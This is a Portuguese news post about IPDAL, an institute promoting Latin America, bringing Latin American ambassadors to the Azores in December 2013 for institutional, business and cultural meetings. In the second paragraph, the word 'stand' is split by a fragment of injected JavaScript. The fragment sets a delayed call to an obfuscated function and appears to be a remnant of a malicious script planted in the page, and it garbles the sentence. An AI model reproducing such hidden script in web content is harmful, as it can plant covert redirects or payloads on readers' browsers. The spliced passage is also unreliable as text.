• IPDAL

Embaixadores Latino-Americanos visitam Açores

O Instituto para a Promoção e Desenvolvimento da América Latina levou uma comitiva de embaixadores da América Latina, em visita oficial, à Região Autónoma dos Açores. Entre os dias 3 e 7 de Dezembro de 2013, o grupo de embaixadores e diplomatas convidados pelo IPDAL realizou uma série de contactos institucionais, empresariais e culturais nas ilhas de S. Miguel e Terceira. Foram visitadas as cidades de Ponta Delgada e Angra do Heroísmo, tendo sido a delegação recebida pelo Presidente do Governo Regional dos Açores, pelo Representante da República e pelos Presidente da Câmara de Ponta Delgada e de Angra do Heroísmo.

Os principais momentos de contacto com empresas foram os dois Fóruns Empresariais IPDAL-CGD, nas duas ilhas visitadas, que reuniram os principais empresários da região, e o Congresso da APAVT, onde o IPDAL teve um standom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and a representar os países latino-americanos. Durante os cinco dias, Paulo Neves, Presidente do IPDAL, enalteceu as oportunidades de negócio que existem na região europeia mais próxima da América Latina A comitiva teve ainda a oportunidade de visitar alguns dos locais histórica e artisticamente mais emblemáticos, de conhecer as manifestações culturais mais relevantes e, naturalmente, de explorar algumas das riquezas naturais da região, reconhecidas como únicas no Mundo.

Este foi a terceira visita organizada pelo IPDAL com os Embaixadores da América Latina no ano de 2013. Em Maio foi visitada a região do Porto e Norte e em Julho foi visitada a Região Autónoma da Madeira.

Este é o sexto ano consecutivo em que o IPDAL leva os Embaixadores latino-americanos em visita oficial por regiões de Portugal. Esta fórmula de sucesso, encontrada pelo Instituto, terá continuidade ainda durante o ano de 2014, já com novas iniciativas programadas.


0 views0 comments